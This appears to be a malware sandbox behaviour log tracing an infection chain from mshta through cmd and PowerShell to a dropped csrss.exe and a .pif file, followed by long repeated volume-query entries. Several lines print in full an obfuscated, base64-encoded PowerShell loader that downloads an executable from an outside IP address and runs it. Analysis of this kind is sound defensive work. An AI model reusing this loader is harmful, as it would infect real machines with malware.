                  Source: C:\Windows\SysWOW64\cmd.exeProcess created: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe PoWErSHeLL -eX BYPass -nOp -w 1 -c DeviceCREdEntialdEpLoyMent ; iEx($(IEX('[SYSteM.TeXT.ENCoDinG]'+[CHar]58+[chaR]58+'UTf8.GETSTRING([SYsTeM.converT]'+[Char]0X3A+[CHAr]0x3a+'FRomBaSe64sTRiNG('+[CHaR]34+'JGpJVDE3aWdEICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgPSAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgIEFERC10WXBlICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgLU1FbWJFckRlZmlOSXRpT24gICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAnW0RsbEltcG9ydCgiVVJsbU9uLkRsTCIsICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgQ2hhclNldCA9IENoYXJTZXQuVW5pY29kZSldcHVibGljIHN0YXRpYyBleHRlcm4gSW50UHRyIFVSTERvd25sb2FkVG9GaWxlKEludFB0ciAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgIEMsc3RyaW5nICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgSVFOak56ZXJlbixzdHJpbmcgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICBjUVQsdWludCAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgIEFIZHlKeixJbnRQdHIgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICBxaWZSaGwpOycgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAtTmFtZSAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICJtaE95RFdxIiAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgIC1uYW1lc3BhY2UgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICBYTEJ3RkNQICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgLVBhc3NUaHJ1OyAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICRqSVQxN2lnRDo6VVJMRG93bmxvYWRUb0ZpbGUoMCwiaHR0cDovLzE5Mi4yMjcuMjI4LjIyLzU0L2NzcnNzLmV4ZSIsIiRlbnY6QVBQREFUQVxjc3Jzcy5leGUiLDAsMCk7c3RBcnQtc0xFRVAoMyk7aU52T2tFLWlURU0gICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAiJGVudjpBUFBEQVRBXGNzcnNzLmV4ZSI='+[cHaR]0X22+'))')))"Jump to behavior
                  Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess created: C:\Windows\Microsoft.NET\Framework\v4.0.30319\csc.exe "C:\Windows\Microsoft.NET\Framework\v4.0.30319\csc.exe" /noconfig /fullpaths @"C:\Users\user\AppData\Local\Temp\xzofjfee\xzofjfee.cmdline"Jump to behavior
                  Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess created: C:\Users\user\AppData\Roaming\csrss.exe "C:\Users\user\AppData\Roaming\csrss.exe" Jump to behavior
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\csc.exeProcess created: C:\Windows\Microsoft.NET\Framework\v4.0.30319\cvtres.exe C:\Windows\Microsoft.NET\Framework\v4.0.30319\cvtres.exe /NOLOGO /READONLY /MACHINE:IX86 "/OUT:C:\Users\user\AppData\Local\Temp\RES43E7.tmp" "c:\Users\user\AppData\Local\Temp\xzofjfee\CSC4F15B4BDA3DF43B881AE17521298E1BA.TMP"Jump to behavior
                  Source: C:\Users\user\AppData\Roaming\csrss.exeProcess created: C:\Users\user\Links\dajivhqI.pif C:\\Users\\user\\Links\dajivhqI.pifJump to behavior
                  Source: C:\Windows\SysWOW64\mshta.exeProcess created: C:\Windows\SysWOW64\cmd.exe "c:\windows\system32\cmd.exe" "/c powershell -ex bypass -nop -w 1 -c devicecredentialdeployment ; iex($(iex('[system.text.encoding]'+[char]58+[char]58+'utf8.getstring([system.convert]'+[char]0x3a+[char]0x3a+'frombase64string('+[char]34+'jgpjvde3awdeicagicagicagicagicagicagicagicagicagicagicagpsagicagicagicagicagicagicagicagicagicagicagieferc10wxblicagicagicagicagicagicagicagicagicagicagicaglu1fbwjfckrlzmlosxrpt24gicagicagicagicagicagicagicagicagicagicagicanw0rsbeltcg9ydcgivvjsbu9ulkrstcisicagicagicagicagicagicagicagicagicagicagicagq2hhclnldca9ienoyxjtzxquvw5py29kzsldchvibgljihn0yxrpyyblehrlcm4gsw50uhryifvstervd25sb2fkvg9gawxlkeludfb0ciagicagicagicagicagicagicagicagicagicagicagiemsc3ryaw5nicagicagicagicagicagicagicagicagicagicagicagsvfoak56zxjlbixzdhjpbmcgicagicagicagicagicagicagicagicagicagicagicbjuvqsdwludcagicagicagicagicagicagicagicagicagicagicagiefizhlkeixjbnrqdhigicagicagicagicagicagicagicagicagicagicagicbxawzsagwpoycgicagicagicagicagicagicagicagicagicagicagicattmftzsagicagicagicagicagicagicagicagicagicagicagicjtae95rfdxiiagicagicagicagicagicagicagicagicagicagicagic1uyw1lc3bhy2ugicagicagicagicagicagicagicagicagicagicagicbytej3rknqicagicagicagicagicagicagicagicagicagicagicaglvbhc3nuahj1oyagicagicagicagicagicagicagicagicagicagicagicrqsvqxn2lnrdo6vvjmrg93bmxvywrub0zpbguomcwiahr0cdovlze5mi4ymjcumji4ljiylzu0l2nzcnnzlmv4zsisiirlbny6qvbqrefuqvxjc3jzcy5leguildasmck7c3rbcnqtc0xfrvaomyk7au52t2tflwluru0gicagicagicagicagicagicagicagicagicagicagicaijgvudjpbufbeqvrbxgnzcnnzlmv4zsi='+[char]0x22+'))')))"
                  Source: C:\Windows\SysWOW64\cmd.exeProcess created: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe powershell -ex bypass -nop -w 1 -c devicecredentialdeployment ; iex($(iex('[system.text.encoding]'+[char]58+[char]58+'utf8.getstring([system.convert]'+[char]0x3a+[char]0x3a+'frombase64string('+[char]34+'jgpjvde3awdeicagicagicagicagicagicagicagicagicagicagicagpsagicagicagicagicagicagicagicagicagicagicagieferc10wxblicagicagicagicagicagicagicagicagicagicagicaglu1fbwjfckrlzmlosxrpt24gicagicagicagicagicagicagicagicagicagicagicanw0rsbeltcg9ydcgivvjsbu9ulkrstcisicagicagicagicagicagicagicagicagicagicagicagq2hhclnldca9ienoyxjtzxquvw5py29kzsldchvibgljihn0yxrpyyblehrlcm4gsw50uhryifvstervd25sb2fkvg9gawxlkeludfb0ciagicagicagicagicagicagicagicagicagicagicagiemsc3ryaw5nicagicagicagicagicagicagicagicagicagicagicagsvfoak56zxjlbixzdhjpbmcgicagicagicagicagicagicagicagicagicagicagicbjuvqsdwludcagicagicagicagicagicagicagicagicagicagicagiefizhlkeixjbnrqdhigicagicagicagicagicagicagicagicagicagicagicbxawzsagwpoycgicagicagicagicagicagicagicagicagicagicagicattmftzsagicagicagicagicagicagicagicagicagicagicagicjtae95rfdxiiagicagicagicagicagicagicagicagicagicagicagic1uyw1lc3bhy2ugicagicagicagicagicagicagicagicagicagicagicbytej3rknqicagicagicagicagicagicagicagicagicagicagicaglvbhc3nuahj1oyagicagicagicagicagicagicagicagicagicagicagicrqsvqxn2lnrdo6vvjmrg93bmxvywrub0zpbguomcwiahr0cdovlze5mi4ymjcumji4ljiylzu0l2nzcnnzlmv4zsisiirlbny6qvbqrefuqvxjc3jzcy5leguildasmck7c3rbcnqtc0xfrvaomyk7au52t2tflwluru0gicagicagicagicagicagicagicagicagicagicagicaijgvudjpbufbeqvrbxgnzcnnzlmv4zsi='+[char]0x22+'))')))"
                  Source: C:\Windows\SysWOW64\mshta.exeProcess created: C:\Windows\SysWOW64\cmd.exe "c:\windows\system32\cmd.exe" "/c powershell -ex bypass -nop -w 1 -c devicecredentialdeployment ; iex($(iex('[system.text.encoding]'+[char]58+[char]58+'utf8.getstring([system.convert]'+[char]0x3a+[char]0x3a+'frombase64string('+[char]34+'jgpjvde3awdeicagicagicagicagicagicagicagicagicagicagicagpsagicagicagicagicagicagicagicagicagicagicagieferc10wxblicagicagicagicagicagicagicagicagicagicagicaglu1fbwjfckrlzmlosxrpt24gicagicagicagicagicagicagicagicagicagicagicanw0rsbeltcg9ydcgivvjsbu9ulkrstcisicagicagicagicagicagicagicagicagicagicagicagq2hhclnldca9ienoyxjtzxquvw5py29kzsldchvibgljihn0yxrpyyblehrlcm4gsw50uhryifvstervd25sb2fkvg9gawxlkeludfb0ciagicagicagicagicagicagicagicagicagicagicagiemsc3ryaw5nicagicagicagicagicagicagicagicagicagicagicagsvfoak56zxjlbixzdhjpbmcgicagicagicagicagicagicagicagicagicagicagicbjuvqsdwludcagicagicagicagicagicagicagicagicagicagicagiefizhlkeixjbnrqdhigicagicagicagicagicagicagicagicagicagicagicbxawzsagwpoycgicagicagicagicagicagicagicagicagicagicagicattmftzsagicagicagicagicagicagicagicagicagicagicagicjtae95rfdxiiagicagicagicagicagicagicagicagicagicagicagic1uyw1lc3bhy2ugicagicagicagicagicagicagicagicagicagicagicbytej3rknqicagicagicagicagicagicagicagicagicagicagicaglvbhc3nuahj1oyagicagicagicagicagicagicagicagicagicagicagicrqsvqxn2lnrdo6vvjmrg93bmxvywrub0zpbguomcwiahr0cdovlze5mi4ymjcumji4ljiylzu0l2nzcnnzlmv4zsisiirlbny6qvbqrefuqvxjc3jzcy5leguildasmck7c3rbcnqtc0xfrvaomyk7au52t2tflwluru0gicagicagicagicagicagicagicagicagicagicagicaijgvudjpbufbeqvrbxgnzcnnzlmv4zsi='+[char]0x22+'))')))"Jump to behavior
                  Source: C:\Windows\SysWOW64\cmd.exeProcess created: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe powershell -ex bypass -nop -w 1 -c devicecredentialdeployment ; iex($(iex('[system.text.encoding]'+[char]58+[char]58+'utf8.getstring([system.convert]'+[char]0x3a+[char]0x3a+'frombase64string('+[char]34+'jgpjvde3awdeicagicagicagicagicagicagicagicagicagicagicagpsagicagicagicagicagicagicagicagicagicagicagieferc10wxblicagicagicagicagicagicagicagicagicagicagicaglu1fbwjfckrlzmlosxrpt24gicagicagicagicagicagicagicagicagicagicagicanw0rsbeltcg9ydcgivvjsbu9ulkrstcisicagicagicagicagicagicagicagicagicagicagicagq2hhclnldca9ienoyxjtzxquvw5py29kzsldchvibgljihn0yxrpyyblehrlcm4gsw50uhryifvstervd25sb2fkvg9gawxlkeludfb0ciagicagicagicagicagicagicagicagicagicagicagiemsc3ryaw5nicagicagicagicagicagicagicagicagicagicagicagsvfoak56zxjlbixzdhjpbmcgicagicagicagicagicagicagicagicagicagicagicbjuvqsdwludcagicagicagicagicagicagicagicagicagicagicagiefizhlkeixjbnrqdhigicagicagicagicagicagicagicagicagicagicagicbxawzsagwpoycgicagicagicagicagicagicagicagicagicagicagicattmftzsagicagicagicagicagicagicagicagicagicagicagicjtae95rfdxiiagicagicagicagicagicagicagicagicagicagicagic1uyw1lc3bhy2ugicagicagicagicagicagicagicagicagicagicagicbytej3rknqicagicagicagicagicagicagicagicagicagicagicaglvbhc3nuahj1oyagicagicagicagicagicagicagicagicagicagicagicrqsvqxn2lnrdo6vvjmrg93bmxvywrub0zpbguomcwiahr0cdovlze5mi4ymjcumji4ljiylzu0l2nzcnnzlmv4zsisiirlbny6qvbqrefuqvxjc3jzcy5leguildasmck7c3rbcnqtc0xfrvaomyk7au52t2tflwluru0gicagicagicagicagicagicagicagicagicagicagicaijgvudjpbufbeqvrbxgnzcnnzlmv4zsi='+[char]0x22+'))')))"Jump to behavior
                  Source: C:\Users\user\AppData\Roaming\csrss.exeCode function: GetModuleFileNameA,RegOpenKeyExA,RegOpenKeyExA,RegOpenKeyExA,RegOpenKeyExA,RegQueryValueExA,RegQueryValueExA,RegCloseKey,lstrcpynA,GetThreadLocale,GetLocaleInfoA,lstrlenA,lstrcpynA,LoadLibraryExA,lstrcpynA,LoadLibraryExA,lstrcpynA,LoadLibraryExA,11_2_02E954BC
                  Source: C:\Users\user\AppData\Roaming\csrss.exeCode function: GetLocaleInfoA,11_2_02E9A0B8
                  Source: C:\Users\user\AppData\Roaming\csrss.exeCode function: GetLocaleInfoA,11_2_02E9A104
                  Source: C:\Users\user\AppData\Roaming\csrss.exeCode function: lstrcpynA,GetThreadLocale,GetLocaleInfoA,lstrlenA,lstrcpynA,LoadLibraryExA,lstrcpynA,LoadLibraryExA,lstrcpynA,LoadLibraryExA,11_2_02E955C8
                  Source: C:\Users\user\Links\dajivhqI.pifCode function: GetLocaleInfoA,16_2_00417A20
                  Source: C:\Users\user\Links\dajivhqI.pifCode function: GetLocaleInfoA,16_1_00417A20
                  Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_32\System.Data\v4.0_4.0.0.0__b77a5c561934e089\System.Data.dll VolumeInformationJump to behavior
                  Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformationJump to behavior
                  Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_32\System.Transactions\v4.0_4.0.0.0__b77a5c561934e089\System.Transactions.dll VolumeInformationJump to behavior
                  Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\ VolumeInformationJump to behavior
                  Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformationJump to behavior
                  Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-GroupPolicy-ClientTools-WOW64-Package~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformationJump to behavior
                  Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-AppManagement-AppV-WOW64-Package~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformationJump to behavior
                  Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_32\Microsoft.Management.Infrastructure.Native\v4.0_1.0.0.0__31bf3856ad364e35\Microsoft.Management.Infrastructure.Native.dll VolumeInformationJump to behavior
                  Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\Modules\AppvClient\Microsoft.AppV.AppVClientPowerShell.dll VolumeInformationJump to behavior
                  Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_32\Microsoft.AppV.AppvClientComConsumer\v4.0_10.0.0.0__31bf3856ad364e35\Microsoft.AppV.AppvClientComConsumer.dll VolumeInformationJump to behavior
                  Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-SecureStartup-Subsystem-WOW64-Package~31bf3856ad364e35~amd64~~10.0.19041.1865.cat VolumeInformationJump to behavior
                  Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-SecureStartup-Subsystem-WOW64-Package~31bf3856ad364e35~amd64~en-GB~10.0.19041.1.cat VolumeInformationJump to behavior
                  Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformationJump to behavior
                  Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformationJump to behavior
                  Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformationJump to behavior
                  Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\Modules\BitLocker\Microsoft.BitLocker.Structures.dll VolumeInformationJump to behavior
                  Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package03~31bf3856ad364e35~amd64~~10.0.19041.2006.cat VolumeInformationJump to behavior
                  Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package03~31bf3856ad364e35~amd64~~10.0.19041.2006.cat VolumeInformationJump to behavior
                  Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\Microsoft.PowerShell.Commands.Management\v4.0_3.0.0.0__31bf3856ad364e35\Microsoft.PowerShell.Commands.Management.dll VolumeInformationJump to behavior
                  Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package03~31bf3856ad364e35~amd64~~10.0.19041.2006.cat VolumeInformationJump to behavior
                  Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Desktop-Required-WOW64-Package0013~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformationJump to behavior
                  Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0314~31bf3856ad364e35~amd64~~10.0.19041.2006.cat VolumeInformationJump to behavior
                  Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_32\Microsoft.KeyDistributionService.Cmdlets\v4.0_10.0.0.0__31bf3856ad364e35\Microsoft.KeyDistributionService.Cmdlets.dll VolumeInformationJump to behavior
                  Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_32\Microsoft.KeyDistributionService.Cmdlets\v4.0_10.0.0.0__31bf3856ad364e35\Microsoft.KeyDistributionService.Cmdlets.dll VolumeInformationJump to behavior
                  Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_32\Microsoft.KeyDistributionService.Cmdlets\v4.0_10.0.0.0__31bf3856ad364e35\Microsoft.KeyDistributionService.Cmdlets.dll VolumeInformationJump to behavior
                  Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package03~31bf3856ad364e35~amd64~~10.0.19041.2006.cat VolumeInformationJump to behavior
                  Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package03~31bf3856ad364e35~amd64~~10.0.19041.2006.cat VolumeInformationJump to behavior
                  Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package03~31bf3856ad364e35~amd64~~10.0.19041.2006.cat VolumeInformationJump to behavior
                  Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package03~31bf3856ad364e35~amd64~~10.0.19041.2006.cat VolumeInformationJump to behavior
                  Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package03~31bf3856ad364e35~amd64~~10.0.19041.2006.cat VolumeInformationJump to behavior
                  Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package03~31bf3856ad364e35~amd64~~10.0.19041.2006.cat VolumeInformationJump to behavior
                  Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package03~31bf3856ad364e35~amd64~~10.0.19041.2006.cat VolumeInformationJump to behavior
                  Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package03~31bf3856ad364e35~amd64~~10.0.19041.2006.cat VolumeInformationJump to behavior
                  Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package03~31bf3856ad364e35~amd64~~10.0.19041.2006.cat VolumeInformationJump to behavior
                  Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package03~31bf3856ad364e35~amd64~~10.0.19041.2006.cat VolumeInformationJump to behavior
                  Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package03~31bf3856ad364e35~amd64~~10.0.19041.2006.cat VolumeInformationJump to behavior
                  Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Desktop-Required-WOW64-Package0014~31bf3856ad364e35~amd64~~10.0.19041.2006.cat VolumeInformationJump to behavior
                  Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Desktop-Required-WOW64-Package0014~31bf3856ad364e35~amd64~~10.0.19041.2006.cat VolumeInformationJump to behavior
                  Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Desktop-Required-WOW64-Package0014~31bf3856ad364e35~amd64~~10.0.19041.2006.cat VolumeInformationJump to behavior
                  Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Desktop-Required-WOW64-Package0014~31bf3856ad364e35~amd64~~10.0.19041.2006.cat VolumeInformationJump to behavior
                  Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Desktop-Required-WOW64-Package0014~31bf3856ad364e35~amd64~~10.0.19041.2006.cat VolumeInformationJump to behavior
                  Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Desktop-Required-WOW64-Package0014~31bf3856ad364e35~amd64~~10.0.19041.2006.cat VolumeInformationJump to behavior
                  Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Desktop-Required-WOW64-Package0014~31bf3856ad364e35~amd64~~10.0.19041.2006.cat VolumeInformationJump to behavior
                  Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Desktop-Required-WOW64-Package0014~31bf3856ad364e35~amd64~~10.0.19041.2006.cat VolumeInformationJump to behavior
                  Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0314~31bf3856ad364e35~amd64~~10.0.19041.2006.cat VolumeInformationJump to behavior
                  Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformationJump to behavior
                  Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformationJump to behavior
                  Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformationJump to behavior
                  Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformationJump to behavior
                  Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformationJump to behavior
                  Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformationJump to behavior
                  Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformationJump to behavior
                  Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformationJump to behavior
                  Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformationJump to behavior
                  Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformationJump to behavior
